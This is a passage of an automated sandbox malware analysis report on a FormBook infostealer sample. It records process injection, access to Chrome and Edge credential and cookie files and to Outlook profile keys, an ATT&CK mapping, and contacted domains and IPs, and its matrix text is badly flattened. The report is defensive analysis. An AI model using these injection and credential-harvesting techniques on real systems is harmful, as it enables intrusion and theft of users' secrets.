                Source: C:\Windows\SysWOW64\where.exeSection loaded: NULL target: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: NULL target: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\where.exeThread register set: target process: 7488Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\where.exeThread APC queued: target process: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\N4533DWG.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B0008Jump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00368A73 LogonUserW,0_2_00368A73
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00313B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00313B4C
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00314A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00314A35
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00374CFA mouse_event,0_2_00374CFA
                Source: C:\Users\user\Desktop\N4533DWG.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N4533DWG.exe"Jump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeProcess created: C:\Windows\SysWOW64\where.exe "C:\Windows\SysWOW64\where.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003681D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003681D4
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00374A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00374A08
                Source: N4533DWG.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: N4533DWG.exe, ICpHO9L5D6CxaaNC.exe, 00000009.00000002.2527715626.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 00000009.00000000.1482780005.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528252196.0000000001971000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000001B.00000002.2453181998.0000000001269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman\Op?\1
                Source: ICpHO9L5D6CxaaNC.exe, 00000009.00000002.2527715626.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 00000009.00000000.1482780005.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528252196.0000000001971000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000020.00000002.2525034811.0000000000508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1ProgmanP
                Source: ICpHO9L5D6CxaaNC.exe, 00000009.00000000.1482780005.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000000.1642308947.0000000001971000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerW
                Source: ICpHO9L5D6CxaaNC.exe, 00000009.00000000.1482780005.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000000.1642308947.0000000001971000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 0000001B.00000003.2367786238.0000000007C42000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007C42000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndK
                Source: explorer.exe, 00000010.00000002.2357640050.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmantSA
                Source: ICpHO9L5D6CxaaNC.exe, 00000009.00000002.2527715626.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528252196.0000000001971000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: jProgram Manager
                Source: explorer.exe, 0000001B.00000003.2367786238.0000000007C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanR
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003387AB cpuid 0_2_003387AB
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00345007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00345007
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0035215F GetUserNameW,0_2_0035215F
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003440BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_003440BA
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00314AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00314AFE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.2530150136.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1576193206.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575534372.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2253215877.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2254186644.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575741699.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2254236592.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2528476866.0000000003A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\where.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\where.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: N4533DWG.exeBinary or memory string: WIN_81
                Source: N4533DWG.exeBinary or memory string: WIN_XP
                Source: N4533DWG.exeBinary or memory string: WIN_XPe
                Source: N4533DWG.exeBinary or memory string: WIN_VISTA
                Source: N4533DWG.exeBinary or memory string: WIN_7
                Source: N4533DWG.exeBinary or memory string: WIN_8
                Source: N4533DWG.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.2530150136.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1576193206.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575534372.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2253215877.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2254186644.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575741699.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2254236592.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2528476866.0000000003A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00386399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00386399
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0038685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0038685D

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets251
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts512
                Process Injection                		1
                Masquerading                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Virtualization/Sandbox Evasion                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                Rundll32                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634984 Sample: N4533DWG.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 47 www.michaelaowen.xyz 2->47 49 96421.BODIS.COM 2->49 51 7 other IPs or domains 2->51 57 Suricata IDS alerts for network traffic 2->57 59 Antivirus detection for URL or domain 2->59 61 Multi AV Scanner detection for submitted file 2->61 65 3 other signatures 2->65 10 N4533DWG.exe 2 2->10         started        13 explorer.exe 2->13         started        15 explorer.exe 2 133 2->15         started        18 2 other processes 2->18 signatures3 63 Performs DNS queries to domains with low reputation 47->63 process4 dnsIp5 69 Binary is likely a compiled AutoIt script file 10->69 71 Writes to foreign memory regions 10->71 73 Maps a DLL or memory area into another process 10->73 75 Switches to a custom stack to bypass stack traces 10->75 20 svchost.exe 10->20         started        77 System process connects to network (likely due to code injection or exploit) 13->77 79 Query firmware table information (likely to detect VMs) 13->79 53 a-0003.a-msedge.net 204.79.197.203, 443, 49712, 49713 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 15->53 23 WerFault.exe 15->23         started        25 WerFault.exe 18->25         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 20->67 27 ICpHO9L5D6CxaaNC.exe 20->27 injected process9 signatures10 81 Found direct / indirect Syscall (likely to bypass EDR) 27->81 30 where.exe 13 27->30         started        process11 signatures12 83 Tries to steal Mail credentials (via file / registry access) 30->83 85 Tries to harvest and steal browser information (history, passwords, etc) 30->85 87 Modifies the context of a thread in another process (thread injection) 30->87 89 3 other signatures 30->89 33 ICpHO9L5D6CxaaNC.exe 30->33 injected 37 explorer.exe 5 4 30->37         started        39 firefox.exe 30->39         started        process13 dnsIp14 41 96421.BODIS.COM 199.59.243.228, 49703, 49704, 49706 BODIS-NJUS United States 33->41 43 www.livream.live 203.161.42.73, 49708, 49709, 49710 VNPT-AS-VNVNPTCorpVN Malaysia 33->43 45 2 other IPs or domains 33->45 55 Found direct / indirect Syscall (likely to bypass EDR) 33->55 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.